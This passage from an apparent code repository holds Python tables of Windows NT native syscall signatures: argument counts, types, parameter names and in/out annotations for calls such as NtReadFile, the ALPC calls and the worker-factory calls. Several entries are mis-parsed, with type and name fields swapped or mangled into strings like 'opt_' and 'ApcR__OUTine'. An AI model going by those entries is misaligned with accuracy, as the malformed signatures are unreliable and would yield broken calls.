"ULONG", "PULONG"], ["TokenHandle", "TokenInformationClass", "TokenInformation", "TokenInformationLength", "ReturnLength"], "NTSTATUS", ["__IN", "__IN", "__OUT", "__IN", "__OUT"]), "NtQueryObject": (5, ["HANDLE", "OBJECT_INFORMATION_CLASS", "PVOID", "ULONG", "PULONG"], ["Handle", "ObjectInformationClass", "ObjectInformation", "ObjectInformationLength", "ReturnLength"], "NTSTATUS", ["__IN_opt", "__IN", "__OUT_opt", "__IN", "__OUT_opt"]), "NtQueryQuotaInformationFile": (9, ["HANDLE", "PIO_STATUS_BLOCK", "PVOID", "ULONG", "BOOLEAN", "PVOID", "ULONG", "PSID", "BOOLEAN"], ["FileHandle", "IoStatusBlock", "Buffer", "Length", "ReturnSingleEntry", "SidList", "SidListLength", "StartSid", "RestartScan"], "NTSTATUS", ["__IN", "__OUT", "__OUT", "__IN", "__IN", "__IN_opt", "__IN", "__IN_opt", "__IN"]), "NtQuerySecurityObject": (5, ["HANDLE", "SECURITY_INFORMATION", "PSECURITY_DESCRIPTOR", "ULONG", "PULONG"], ["Handle", "SecurityInformation", "SecurityDescriptor", "Length", "LengthNeeded"], "NTSTATUS", ["__IN", "__IN", "__OUT", "__IN", "__OUT"]), "NtQueryVirtualMemory": (6, ["HANDLE", "PVOID", "MEMORY_INFORMATION_CLASS", "PVOID", "SIZE_T", "PSIZE_T"], ["ProcessHandle", "BaseAddress", "MemoryInformationClass", "MemoryInformation", "MemoryInformationLength", "ReturnLength"], "NTSTATUS", ["__IN", "__IN_opt", "__IN", "__OUT", "__IN", "__OUT_opt"]), "NtQueryVolumeInformationFile": (5, ["HANDLE", "PIO_STATUS_BLOCK", "PVOID", "ULONG", "FS_INFORMATION_CLASS"], ["FileHandle", "IoStatusBlock", "FsInformation", "Length", "FsInformationClass"], "NTSTATUS", ["__IN", "__OUT", "__OUT", "__IN", "__IN"]), "NtReadFile": (9, ["HANDLE", "HANDLE", "PIO_APC_ROUTINE", "PVOID", "PIO_STATUS_BLOCK", "PVOID", "ULONG", "PLARGE_INTEGER", "PULONG"], ["FileHandle", "Event", "ApcRoutine", "ApcContext", "IoStatusBlock", "Buffer", "Length", "ByteOffset", "Key"], "NTSTATUS", ["__IN", "__IN_opt", "__IN_opt", "__IN_opt", "__OUT", "__OUT", "__IN", "__IN_opt", "__IN_opt"]), "NTSetInformationFile": (5, ["HANDLE", "PIO_STATUS_BLOCK", "PVOID", "ULONG", "FILE_INFORMATION_CLASS"], ["FileHandle", "IoStatusBlock", "FileInformation", "Length", "FileInformationClass"], "NTSTATUS", ["__IN", "__OUT", "__IN", "__IN", "__IN"]), "NTSetInformationThread": (4, ["HANDLE", "THREADINFOCLASS", "PVOID", "ULONG"], ["ThreadHandle", "ThreadInformationClass", "ThreadInformation", "ThreadInformationLength"], "NTSTATUS", ["__IN", "__IN", "__IN", "__IN"]), "NTSetInformationToken": (4, ["HANDLE", "TOKEN_INFORMATION_CLASS", "PVOID", "ULONG"], ["TokenHandle", "TokenInformationClass", "TokenInformation", "TokenInformationLength"], "NTSTATUS", ["__IN", "__IN", "__IN", "__IN"]), "NTSetQuotaInformationFile": (4, ["HANDLE", "PIO_STATUS_BLOCK", "PVOID", "ULONG"], ["FileHandle", "IoStatusBlock", "Buffer", "Length"], "NTSTATUS", ["__IN", "__OUT", "__IN", "__IN"]), "NTSetSecurityObject": (3, ["HANDLE", "SECURITY_INFORMATION", "PSECURITY_DESCRIPTOR"], ["Handle", "SecurityInformation", "SecurityDescriptor"], "NTSTATUS", ["__IN", "__IN", "__IN"]), "NtUnlockFile": (5, ["HANDLE", "PIO_STATUS_BLOCK", "PLARGE_INTEGER", "PLARGE_INTEGER", "ULONG"], ["FileHandle", "IoStatusBlock", "ByteOffset", "Length", "Key"], "NTSTATUS", ["__IN", "__OUT", "__IN", "__IN", "__IN"]), "NtWriteFile": (9, ["HANDLE", "HANDLE", "PIO_APC_ROUTINE", "PVOID", "PIO_STATUS_BLOCK", "PVOID", "ULONG", "PLARGE_INTEGER", "PULONG"], ["FileHandle", "Event", "ApcRoutine", "ApcContext", "IoStatusBlock", "Buffer", "Length", "ByteOffset", "Key"], "NTSTATUS", ["__IN", "__IN_opt", "__IN_opt", "__IN_opt", "__OUT", "__IN", "__IN", "__IN_opt", "__IN_opt"])} ================================================ FILE: start/syscall_signatures.py ================================================ syscall_signature = {'NtWorkerFactoryWorkerReady': (1, ['HANDLE'], ['WorkerFactoryHandle'], 'NTSTATUS', ['__IN']), 'NtMapUserPhysicalPagesScatter': (3, ['PVOID', 'ULONG_PTR', 'PULONG_PTR'], ['*VirtualAddresses', 'NumberOfPages', 'UserPfnArray'], 'NTSTATUS', ['__IN', '__IN', '__IN']), 'NtWaitForMultipleObjects32': (5, ['ULONG', 'PLONG', 'WAIT_TYPE', 'BOOLEAN', 'PLARGE_INTEGER'], ['ObjectCount', 'Handles', 'WaitType', 'Alertable', 'Time_Out'], 'Nt_WAIT_RESULT', [None, None, None, None, None]), 'NtReplyWaitReceivePortEx': (5, ['HANDLE', 'PVOID', 'PPORT_MESSAGE', 'PPORT_MESSAGE', 'PLARGE_INTEGER'], ['PortHandle', '*PortContext', 'ReplyMessage', 'ReceiveMessage', 'Time_Out'], 'NTSTATUS', ['__IN', '__OUT_opt', '__IN_opt', '__OUT_opt', '__IN_opt']), 'NtQueryDefaultUILanguage': (1, ['*LANGID'], ['DefaultUILanguageId'], 'NTSTATUS', [None]), 'NtApphelpCacheControl': (2, ['AHC_SERVICE_CLASS', 'PVOID'], ['ServiceClass', 'ServiceContext'], 'NTSTATUS', ['__IN_', '__IN_OUT_opt_']), 'NtCreateProcessEx': (9, ['HANDLE', 'ACCESS_MASK', 'OBJECT_ATTRIBUTES', 'HANDLE', 'BOOLEAN', 'HANDLE', 'HANDLE', 'HANDLE', 'BOOLEAN'], ['ProcessHandle', 'DesiredAccess', 'ObjectAttributes', 'ParentProcess', 'InheritObjectTable', 'SectionHandle', 'DebugPort', 'ExceptionPort', 'InJob'], 'NTSTATUS', ['__OUT', '__IN', '__IN_opt', '__IN', '__IN', '__IN_opt', '__IN_opt', '__IN_opt', '__IN']), 'NtIsProcessInJob': (2, ['HANDLE', 'HANDLE'], ['ProcessHandle', 'JobHandle'], 'NTSTATUS', ['__IN_', '__IN_opt_']), 'NtAccessCheckByTypeAndAuditAlarm': (16, ['PUNICODE_STRING', 'PVOID', 'PUNICODE_STRING', 'PUNICODE_STRING', 'PSECURITY_DESCRIPTOR', 'PSID', 'ACCESS_MASK', 'AUDIT_EVENT_TYPE', 'ULONG', 'POBJECT_TYPE_LIST', 'ULONG', 'PGENERIC_MAPPING', 'BOOLEAN', 'PACCESS_MASK', 'PNTSYSAPI', 'PBOOLEAN'], ['SubsystemName', 'HandleId', 'ObjectTypeName', 'ObjectName', 'SecurityDescriptor', 'PrincipalSelfSid', 'DesiredAccess', 'AuditType', 'Flags', 'ObjectTypeList', 'ObjectTypeListLength', 'GenericMapping', 'ObjectCreation', 'GrantedAccess', 'NTSTATUS', 'GenerateOnClose'], 'NTSTATUS', ['__IN_', '__IN_opt_', '__IN_', '__IN_', '__IN_', '__IN_opt_', '__IN_', '__IN_', '__IN_', None, '__IN_', '__IN_', '__IN_', None, None, None]), 'NtTraceEvent': (4, ['HANDLE', 'ULONG', 'ULONG', 'PVOID'], ['TraceHandle', 'Flags', 'FieldSize', 'Fields'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN']), 'NtPowerInformation': (5, ['POWER__INFORMATION_LEVEL', 'PVOID', 'ULONG', 'PVOID', 'ULONG'], ['InformationLevel', 'InputBuffer', 'InputBufferLength', '__OUTputBuffer', '__OUTputBufferLength'], 'NTSTATUS', ['__IN_', None, '__IN_', None, '__IN_']), 'NtAccessCheckByType': (11, ['PSECURITY_DESCRIPTOR', 'PSID', 'HANDLE', 'ACCESS_MASK', 'POBJECT_TYPE_LIST', 'ULONG', 'PGENERIC_MAPPING', 'PPRIVILEGE_SET', 'PULONG', 'PACCESS_MASK', 'PNTSYSAPI'], ['SecurityDescriptor', 'PrincipalSelfSid', 'ClientToken', 'DesiredAccess', 'ObjectTypeList', 'ObjectTypeListLength', 'GenericMapping', 'PrivilegeSet', 'PrivilegeSetLength', 'GrantedAccess', 'NTSTATUS'], 'NTSTATUS', ['__IN_', '__IN_opt_', '__IN_', '__IN_', None, '__IN_', '__IN_', None, '__IN_OUT_', None, None]), 'NtAccessCheckByTypeResultList': (11, ['PSECURITY_DESCRIPTOR', 'PSID', 'HANDLE', 'ACCESS_MASK', 'POBJECT_TYPE_LIST', 'ULONG', 'PGENERIC_MAPPING', 'PPRIVILEGE_SET', 'PULONG', 'PACCESS_MASK', 'PNTSYSAPI'], ['SecurityDescriptor', 'PrincipalSelfSid', 'ClientToken', 'DesiredAccess', 'ObjectTypeList', 'ObjectTypeListLength', 'GenericMapping', 'PrivilegeSet', 'PrivilegeSetLength', 'GrantedAccess', 'NTSTATUS'], 'NTSTATUS', ['__IN_', '__IN_opt_', '__IN_', '__IN_', None, '__IN_', '__IN_', None, '__IN_OUT_', None, None]), 'NtAccessCheckByTypeResultListAndAuditAlarm': (16, ['PUNICODE_STRING', 'PVOID', 'PUNICODE_STRING', 'PUNICODE_STRING', 'PSECURITY_DESCRIPTOR', 'PSID', 'ACCESS_MASK', 'AUDIT_EVENT_TYPE', 'ULONG', 'POBJECT_TYPE_LIST', 'ULONG', 'PGENERIC_MAPPING', 'BOOLEAN', 'PACCESS_MASK', 'PNTSYSAPI', 'PBOOLEAN'], ['SubsystemName', 'HandleId', 'ObjectTypeName', 'ObjectName', 'SecurityDescriptor', 'PrincipalSelfSid', 'DesiredAccess', 'AuditType', 'Flags', 'ObjectTypeList', 'ObjectTypeListLength', 'GenericMapping', 'ObjectCreation', 'GrantedAccess', 'NTSTATUS', 'GenerateOnClose'], 'NTSTATUS', ['__IN_', '__IN_opt_', '__IN_', '__IN_', '__IN_', '__IN_opt_', '__IN_', '__IN_', '__IN_', None, '__IN_', '__IN_', '__IN_', None, None, None]), 'NtAccessCheckByTypeResultListAndAuditAlarmByHandle': (17, ['PUNICODE_STRING', 'PVOID', 'HANDLE', 'PUNICODE_STRING', 'PUNICODE_STRING', 'PSECURITY_DESCRIPTOR', 'PSID', 'ACCESS_MASK', 'AUDIT_EVENT_TYPE', 'ULONG', 'POBJECT_TYPE_LIST', 'ULONG', 'PGENERIC_MAPPING', 'BOOLEAN', 'PACCESS_MASK', 'PNTSYSAPI', 'PBOOLEAN'], ['SubsystemName', 'HandleId', 'ClientToken', 'ObjectTypeName', 'ObjectName', 'SecurityDescriptor', 'PrincipalSelfSid', 'DesiredAccess', 'AuditType', 'Flags', 'ObjectTypeList', 'ObjectTypeListLength', 'GenericMapping', 'ObjectCreation', 'GrantedAccess', 'NTSTATUS', 'GenerateOnClose'], 'NTSTATUS', ['__IN_', '__IN_opt_', '__IN_', '__IN_', '__IN_', '__IN_', '__IN_opt_', '__IN_', '__IN_', '__IN_', None, '__IN_', '__IN_', '__IN_', None, None, None]), 'NtAddAtomEx': (4, ['PWSTR', 'ULONG', 'opt_', 'ULONG'], ['AtomName', 'Length', 'PRTL_ATOM', 'Flags'], 'NTSTATUS', [None, '__IN_', None, '__IN_']), 'NtAddBootEntry': (2, ['PBOOT_ENTRY', 'opt_'], ['BootEntry', 'PULONG'], 'NTSTATUS', ['__IN_', None]), 'NtAddDriverEntry': (2, ['PEFI_DRIVER_ENTRY', 'opt_'], ['DriverEntry', 'PULONG'], 'NTSTATUS', ['__IN_', None]), 'NtAdjustTokenClaimsAndDeviceGroups': (16, ['HANDLE', 'BOOLEAN', 'BOOLEAN', 'BOOLEAN', 'PTOKEN_SECURITY_ATTRIBUTES__INFORMATION', 'PTOKEN_SECURITY_ATTRIBUTES__INFORMATION', 'PTOKEN_GROUPS', 'ULONG', 'PTOKEN_SECURITY_ATTRIBUTES__INFORMATION', 'ULONG', 'PTOKEN_SECURITY_ATTRIBUTES__INFORMATION', 'ULONG', 'PTOKEN_GROUPS', 'opt_', 'opt_', 'opt_'], ['TokenHandle', 'UserResetToDefault', 'DeviceResetToDefault', 'DeviceGroupsResetToDefault', 'NewUserState', 'NewDeviceState', 'NewDeviceGroupsState', 'UserBufferLength', 'PreviousUserState', 'DeviceBufferLength', 'PreviousDeviceState', 'DeviceGroupsBufferLength', 'PreviousDeviceGroups', 'PULONG', 'PULONG', 'PULONG'], 'NTSTATUS', ['__IN_', '__IN_', '__IN_', '__IN_', '__IN_opt_', '__IN_opt_', '__IN_opt_', '__IN_', None, '__IN_', None, '__IN_', None, None, None, None]), 'NtAlertThreadByThreadId': (1, ['DWORD'], ['threadID'], 'NTSTATUS', [None]), 'NtAllocateReserveObject': (3, ['PHANDLE', 'POBJECT_ATTRIBUTES', 'MEMORY_RESERVE_TYPE'], ['MemoryReserveHandle', 'ObjectAttributes', 'Type'], 'NTSTATUS', ['__OUT', '__IN_opt', '__IN']), 'NtGetNextProcess': (5, ['HANDLE', 'ACCESS_MASK', 'ULONG', 'ULONG', 'PHANDLE'], ['ProcessHandle', 'DesiredAccess', 'HandleAttributes', 'Flags', 'NewProcessHandle'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN', '__OUT']), 'NtGetNextThread': (6, ['HANDLE', 'HANDLE', 'ACCESS_MASK', 'ULONG', 'ULONG', 'PHANDLE'], ['ProcessHandle', 'ThreadHandle', 'DesiredAccess', 'HandleAttributes', 'Flags', 'NewThreadHandle'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN', '__IN', '__OUT']), 'NtQueueApcThreadEx': (6, ['HANDLE', 'HANDLE', 'PPS_APC_R__OUTINE', 'PVOID', 'PVOID', 'PVOID'], ['ThreadHandle', 'UserApcReserveHandle', 'ApcR__OUTine', 'ApcArgument1', 'ApcArgument2', 'ApcArgument3'], 'NTSTATUS', ['__IN', '__IN_opt', '__IN', '__IN_opt', '__IN_opt', '__IN_opt']), 'NtUmsThreadYield': (1, ['PVOID'], ['SchedulerParam'], 'NTSTATUS', ['__IN']), 'NtAllocateUserPhysicalPages': (3, ['HANDLE', 'PULONG_PTR', 'PULONG_PTR'], ['ProcessHandle', 'NumberOfPages', 'UserPfnArray'], 'NTSTATUS', ['__IN', '__IN_OUT', '__OUT']), 'NtAllocateVirtualMemoryEx': (7, ['HANDLE', 'PVOID*', 'PSIZE_T', 'ULONG', 'ULONG', 'PMEM_EXTENDED_PARAMETER', 'ULONG'], ['ProcessHandle', 'BaseAddress', 'RegionSize', 'AllocationType', 'PageProtection', 'ExtendedParameters', 'ExtendedParameterCount'], 'NTSTATUS', ['__IN_', None, '__IN_OUT_', '__IN_', '__IN_', None, '__IN_']), 'NtAlpcAcceptConnectPort': (9, ['PHANDLE', 'HANDLE', 'ULONG', 'POBJECT_ATTRIBUTES', 'PALPC_PORT_ATTRIBUTES', 'PVOID', 'PPORT_MESSAGE', 'PALPC_MESSAGE_ATTRIBUTES', 'BOOLEAN'], ['PortHandle', 'ConnectionPortHandle', 'Flags', 'ObjectAttributes', 'PortAttributes', 'PortContext', 'ConnectionRequest', 'ConnectionMessageAttributes', 'AcceptConnection'], 'NTSTATUS', ['__OUT', '__IN', '__IN', '__IN', '__IN', '__IN_opt', '__IN', '__IN_OUT_opt', '__IN']), 'NtAlpcCancelMessage': (3, ['HANDLE', 'ULONG', 'ALPC_CONTEXT_ATTRIBUTES'], ['PortHandle', 'Flags', 'MessageContext'], 'NTSTATUS', ['__IN', '__IN', '__IN']), 'NtAlpcCreatePort': (3, ['PHANDLE', 'POBJECT_ATTRIBUTES', 'PALPC_PORT_ATTRIBUTES'], ['PortHandle', 'ObjectAttributes', 'PortAttributes'], 'NTSTATUS', ['__OUT', '__IN', '__IN_opt']), 'NtAlpcCreatePortSection': (6, ['HANDLE', 'ULONG', 'HANDLE', 'ULONG', 'PHANDLE', 'PULONG'], ['PortHandle', 'Flags', 'SectionHandle', 'SectionSize', 'AlpcSectionHandle', 'ActualSectionSize'], 'NTSTATUS', ['__IN', '__IN', '__IN_opt', '__IN', '__OUT', '__OUT']), 'NtAlpcCreateResourceReserve': (4, ['HANDLE', '__reserved', 'SIZE_T', 'PHANDLE'], ['PortHandle', 'ULONG', 'MessageSize', 'ResourceID'], 'NTSTATUS', ['__IN', None, '__IN', '__OUT']), 'NtAlpcCreateSectionView': (3, ['HANDLE', '__reserved', 'PALPC_DATA_VIEW'], ['PortHandle', 'ULONG', 'ViewAttrbutes'], 'NTSTATUS', ['__IN', None, '__IN_OUT']), 'NtAlpcCreateSecurityContext': (3, ['HANDLE', '__reserved', 'PALPC_SECURITY_ATTRIBUTES'], ['PortHandle', 'ULONG', 'SecurityAttribute'], 'NTSTATUS', ['__IN', None, '__IN_OUT']), 'NtAlpcDeletePortSection': (3, ['HANDLE', '__reserved', 'HANDLE'], ['PortHandle', 'ULONG', 'SectionHandle'], 'NTSTATUS', ['__IN', None, '__IN']), 'NtAlpcDeleteResourceReserve': (3, ['HANDLE', '__reserved', 'HANDLE'], ['PortHandle', 'ULONG', 'ResourceID'], 'NTSTATUS', ['__IN', None, '__IN']), 'NtAlpcDeleteSectionView': (3, ['HANDLE', '__reserved', 'PVOID'], ['PortHandle', 'ULONG', 'ViewBase'], 'NTSTATUS', ['__IN', None, '__IN']), 'NtAlpcDeleteSecurityContext': (3, ['HANDLE', '__reserved', 'HANDLE'], ['PortHandle', 'ULONG', 'ContextHandle'], 'NTSTATUS', ['__IN', None, '__IN']), 'NtAlpcDisconnectPort': (2, ['HANDLE', 'ULONG'], ['PortHandle', 'Flags'], 'NTSTATUS', ['__IN', '__IN']), 'NtAlpcImpersonateClientOfPort': (3, ['HANDLE', 'PPORT_MESSAGE', '__reserved'], ['PortHandle', 'PortMessage', 'PVOID'], 'NTSTATUS', ['__IN', '__IN', None]), 'NtAlpcOpenSenderProcess': (6, ['HANDLE', 'HANDLE', 'PPORT_MESSAGE', '__reserved', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES'], ['ProcessHandle', 'PortHandle', 'PortMessage', 'ULONG', 'Access', 'ObjectAttribute'], 'NTSTATUS', ['__OUT', '__IN', '__IN', None, '__IN', '__IN']), 'NtAlpcOpenSenderThread': (6, ['HANDLE', 'HANDLE', 'PPORT_MESSAGE', '__reserved', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES'], ['ThreadHandle', 'PortHandle', 'PortMessage', 'ULONG', 'Access', 'ObjectAttributes'], 'NTSTATUS', ['__OUT', '__IN', '__IN', None, '__IN', '__IN']), 'NtAlpcQueryInformation': (5, ['HANDLE', 'ALPC_PORT__INFORMATION_CLASS', '_bcount', 'ULONG', '__opt'], ['PortHandle', 'PortInformationClass', 'PVOID', 'Length', 'PULONG'], 'NTSTATUS', ['__IN', '__IN', None, '__IN', None]), 'NtAlpcQueryInformationMessage': (6, ['HANDLE', 'PPORT_MESSAGE', 'ALPC_MESSAGE__INFORMATION_CLASS', '_bcount', 'ULONG', '__opt'], ['PortHandle', 'PortMessage', 'MessageInformationClass', 'PVOID', 'Length', 'PULONG'], 'NTSTATUS', ['__IN', '__IN', '__IN', None, '__IN', None]), 'NtAlpcRevokeSecurityContext': (3, ['HANDLE', '__reserved', 'HANDLE'], ['PortHandle', 'ULONG', 'ContextHandle'], 'NTSTATUS', ['__IN', None, '__IN']), 'NtAlpcSendWaitReceivePort': (8, ['HANDLE', 'ULONG', 'PPORT_MESSAGE', 'PALPC_MESSAGE_ATTRIBUTES', 'PPORT_MESSAGE', 'PULONG', 'PALPC_MESSAGE_ATTRIBUTES', 'PLARGE_INTEGER'], ['PortHandle', 'Flags', 'SendMessage', 'SendMessageAttributes', 'ReceiveMessage', 'BufferLength', 'ReceiveMessageAttributes', 'Time_Out'], 'NTSTATUS', ['__IN', '__IN', '__IN_opt', '__IN_OUT_opt', '__IN_OUT_opt', '__IN_OUT_opt', '__IN_OUT_opt', '__IN_opt']), 'NtAlpcSetInformation': (4, ['HANDLE', 'ALPC_PORT__INFORMATION_CLASS', 'PVOID', 'ULONG'], ['PortHandle', 'PortInformationClass', 'PortInformation', 'Length'], 'NTSTATUS', ['__IN', '__IN', '__IN_bcount', '__IN']), 'NtEnumerateBootEntries': (2, ['PVOID', 'PULONG'], ['Buffer', 'BufferLength'], 'NTSTATUS', [None, '__IN_OUT']), 'NtEnumerateDriverEntries': (2, ['PVOID', 'PULONG'], ['Buffer', 'BufferLength'], 'NTSTATUS', [None, '__IN_OUT']), 'NtEnumerateSystemEnvironmentValuesEx': (3, ['ULONG', 'PVOID', 'PULONG'], ['InformationClass', 'Buffer', 'BufferLength'], 'NTSTATUS', ['__IN', '__OUT', '__IN_OUT']), 'NtQueryBootEntryOrder': (2, ['PULONG', 'PULONG'], ['Ids', 'Count'], 'NTSTATUS', [None, '__IN_OUT']), 'NtQueryBootOptions': (2, ['PBOOT_OPTIONS', 'PULONG'], ['BootOptions', 'BootOptionsLength'], 'NTSTATUS', [None, '__IN_OUT']), 'NtQueryDriverEntryOrder': (2, ['PULONG', 'PULONG'], ['Ids', 'Count'], 'NTSTATUS', [None, '__IN_OUT']), 'NtQuerySystemEnvironmentValueEx': (5, ['PUNICODE_STRING', 'LPGUID', 'PVOID', 'PULONG', '__opt'], ['VariableName', 'VendorGuid', 'Value', 'ValueLength', 'PULONG'], 'NTSTATUS', ['__IN', '__IN', None, '__IN_OUT', None]), 'NtSetBootEntryOrder': (2, ['PULONG', 'ULONG'], ['Ids', 'Count'], 'NTSTATUS', [None, '__IN']), 'NtSetDriverEntryOrder': (2, ['PULONG', 'ULONG'], ['Ids', 'Count'], 'NTSTATUS', [None, '__IN']), 'NtQuerySystemInformationEx': (6, ['SYSTEM__INFORMATION_CLASS', 'PVOID', 'ULONG', 'PVOID', 'ULONG', '__opt'], ['SystemInformationClass', 'QueryInformation', 'QueryInformationLength', 'SystemInformation', 'SystemInformationLength', 'PULONG'], 'NTSTATUS', ['__IN', None, '__IN', None, '__IN', None]), 'NtInitializeNlsFiles': (3, ['PVOID', 'PLCID', 'PLARGE_INTEGER'], ['*BaseAddress', 'DefaultLocaleId', 'DefaultCasingTableSize'], 'NTSTATUS', ['__OUT', '__OUT', '__OUT']), 'NtAcquireCMFViewOwnership': (3, ['PULONGLONG', 'PBOOLEAN', 'BOOLEAN'], ['TimeStamp', 'tokenTaken', 'replaceExisting'], 'NTSTATUS', ['__OUT', '__OUT', '__IN']), 'NtCreateProfileEx': (10, ['PHANDLE', 'HANDLE', 'PVOID', 'SIZE_T', 'ULONG', 'PULONG', 'ULONG', 'KPROFILE_SOURCE', 'ULONG', 'PGROUP_AFFINITY'], ['ProfileHandle', 'Process', 'ProfileBase', 'ProfileSize', 'BucketSize', 'Buffer', 'BufferSize', 'ProfileSource', 'GroupAffinityCount', 'GroupAffinity'], 'NTSTATUS', ['__OUT', '__IN_opt', '__IN', '__IN', '__IN', '__IN', '__IN', '__IN', '__IN', '__IN_opt']), 'NtCreateWorkerFactory': (10, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'HANDLE', 'HANDLE', 'PVOID', 'PVOID', 'ULONG', 'SIZE_T', 'SIZE_T'], ['WorkerFactoryHandleReturn', 'DesiredAccess', 'ObjectAttributes', 'CompletionPortHandle', 'WorkerProcessHandle', 'StartR__OUTine', 'StartParameter', 'MaxThreadCount', 'StackReserve', 'StackCommit'], 'NTSTATUS', ['__OUT', '__IN', '__IN_opt', '__IN', '__IN', '__IN', '__IN_opt', '__IN_opt', '__IN_opt', '__IN_opt']), 'NtFlushInstallUILanguage': (2, ['LANGID', 'ULONG'], ['InstallUILanguage', 'SetComittedFlag'], 'NTSTATUS', ['__IN', '__IN']), 'NtGetMUIRegistryInfo': (3, ['ULONG', 'PULONG', 'PVOID'], ['Flags', 'DataSize', 'Data'], 'NTSTATUS', ['__IN', '__IN_OUT', '__OUT']), 'NtGetNlsSectionPtr': (5, ['ULONG', 'ULONG', 'PVOID', 'PVOID', 'PULONG'], ['SectionType', 'SectionData', 'ContextData', '*SectionPointer', 'SectionSize'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__OUT', '__OUT']), 'NtIsUILanguageComitted': (0, [], [], 'NTSTATUS', []), 'NtReleaseCMFViewOwnership': (0, [], [], 'NTSTATUS', []), 'NtReleaseWorkerFactoryWorker': (1, ['HANDLE'], ['WorkerFactoryHandle'], 'NTSTATUS', ['__IN']), 'NtQueryInformationWorkerFactory': (5, ['HANDLE', 'WORKERFACTORYINFOCLASS', 'PVOID', 'ULONG', '__opt'], ['WorkerFactoryHandle', 'WorkerFactoryInformationClass', 'WorkerFactoryInformation', 'WorkerFactoryInformationLength', 'PULONG'], 'NTSTATUS', ['__IN', '__IN', None, '__IN', None]), 'NtSetInformationWorkerFactory': (4, ['HANDLE', 'WORKERFACTORYINFOCLASS', 'PVOID', 'ULONG'], ['WorkerFactoryHandle', 'WorkerFactoryInformationClass', 'WorkerFactoryInformation', 'WorkerFactoryInformationLength'], 'NTSTATUS', ['__IN', '__IN', None, '__IN']), 'NtWaitForWorkViaWorkerFactory': (2, ['HANDLE', 'FILE_IO_COMPLETION__INFORMATION'], ['WorkerFactoryHandle', '*MiniPacket'], 'NTSTATUS', ['__IN', '__OUT']), 'NtShutdownWorkerFactory': (2, ['HANDLE', 'LONG'], ['WorkerFactoryHandle', '*PendingWorkerCount'], 'NTSTATUS', ['__IN', '__IN_OUT']), 'NtSetTimerEx': (4, ['HANDLE', 'TIMER_SET__INFORMATION_CLASS', 'PVOID', 'ULONG'], ['TimerHandle', 'TimerSetInformationClass', 'TimerSetInformation', 'TimerSetInformationLength'], 'NTSTATUS', ['__IN', '__IN', None, '__IN']), 'NtCancelTimer2': (2, ['HANDLE', '__opt'], ['TimerHandle', 'PBOOLEAN'], 'NTSTATUS', ['__IN', None]), 'NtSetTimer2': (4, ['HANDLE', 'PLARGE_INTEGER', 'PLARGE_INTEGER', 'PT2_SET_PARAMETERS'], ['TimerHandle', 'DueTime', 'Period', 'Parameters'], 'NTSTATUS', ['__IN', '__IN', '__IN_opt', '__IN']), 'NtQueryWnfStateData': (6, ['PCWNF_STATE_NAME', 'PCWNF_TYPE_ID', 'PVOID', 'PWNF_CHANGE_STAMP', 'PVOID', 'PULONG'], ['StateName', 'TypeId', 'ExplicitScope', 'ChangeStamp', 'Buffer', 'BufferSize'], 'NTSTATUS', ['__IN_', '__IN_opt_', '__IN_opt_', None, None, '__IN_OUT_']), 'NtUpdateWnfStateData': (7, ['PCWNF_STATE_NAME', 'PVOID', 'ULONG', 'PCWNF_TYPE_ID', 'PVOID', 'WNF_CHANGE_STAMP', 'LOGICAL'], ['StateName', 'Buffer', 'Length', 'TypeId', 'ExplicitScope', 'MatchingChangeStamp', 'CheckStamp'], 'NTSTATUS', ['__IN_', None, '__IN_opt_', '__IN_opt_', '__IN_opt_', '__IN_', '__IN_']), 'NtDisableLastKnownGood': (0, [], [], 'NTSTATUS', []), 'NtEnableLastKnownGood': (0, [], [], 'NTSTATUS', []), 'NtCancelSynchronousIoFile': (3, ['HANDLE', 'PIO_STATUS_BLOCK', 'PIO_STATUS_BLOCK'], ['ThreadHandle', 'IoRequestToCancel', 'IoStatusBlock'], 'NTSTATUS', ['__IN', '__IN_opt', '__OUT']), 'NtSetIoCompletion': (5, ['HANDLE', 'ULONG', 'PVOID', 'NTSTATUS', 'ULONG_PTR'], ['IoCompletionHandle', 'CompletionKey', 'CompletionValue', 'IoStatus', 'IoStatusInformation'], 'NTSTATUS', ['__IN', '__IN', '__IN_opt', '__IN', '__IN']), 'NtSetIoCompletionEx': (6, ['HANDLE', 'HANDLE', 'ULONG', 'PVOID', 'NTSTATUS', 'ULONG_PTR'], ['IoCompletionHandle', 'IoCompletionReserveHandle', 'CompletionKey', 'CompletionValue', 'IoStatus', 'IoStatusInformation'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN_opt', '__IN', '__IN']), 'NtRemoveIoCompletionEx': (6, ['HANDLE', 'FILE_IO_COMPLETION__INFORMATION', 'ULONG', 'PVOID', 'PLARGE_INTEGER', 'BOOLEAN'], ['IoCompletionHandle', 'IoCompletionInformation', 'Count', 'NumEntriesRemoved', 'Time_Out', 'Alertable'], 'NTSTATUS', ['__IN', None, '__IN', '__OUT', '__IN_opt', '__IN']), 'NtNotifyChangeSession': (8, ['HANDLE', 'ULONG', 'PVOID', 'ULONG', 'IO_SESSION_STATE', 'IO_SESSION_STATE', 'PVOID', 'ULONG'], ['SessionHandle', 'IoStateSequence', 'Reserved', 'Action', 'IoState', 'IoState2', 'Buffer', 'BufferSize'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN', '__IN', '__IN', '__IN', '__IN']), 'NtAssociateWaitCompletionPacket': (8, ['HANDLE', 'HANDLE', 'HANDLE', 'PVOID', 'PVOID', 'NTSTATUS', 'ULONG_PTR', 'opt_'], ['WaitCompletionPacketHandle', 'IoCompletionHandle', 'TargetObjectHandle', 'KeyContext', 'ApcContext', 'IoStatus', 'IoStatusInformation', 'PBOOLEAN'], 'NTSTATUS', ['__IN_', '__IN_', '__IN_', '__IN_opt_', '__IN_opt_', '__IN', '__IN_', None]), 'NtFlushProcessWriteBuffers': (0, [], [], 'NTSTATUS', []), 'NtCommitComplete': (2, ['HANDLE', 'PLARGE_INTEGER'], ['EnlistmentHandle', 'TmVirtualClock'], 'NTSTATUS', ['__IN', '__IN_opt']), 'NtCommitEnlistment': (2, ['HANDLE', 'PLARGE_INTEGER'], ['EnlistmentHandle', 'TmVirtualClock'], 'NTSTATUS', ['__IN', '__IN_opt']), 'NtCommitTransaction': (2, ['HANDLE', 'BOOLEAN'], ['TransactionHandle', 'Wait'], 'NTSTATUS', ['__IN', 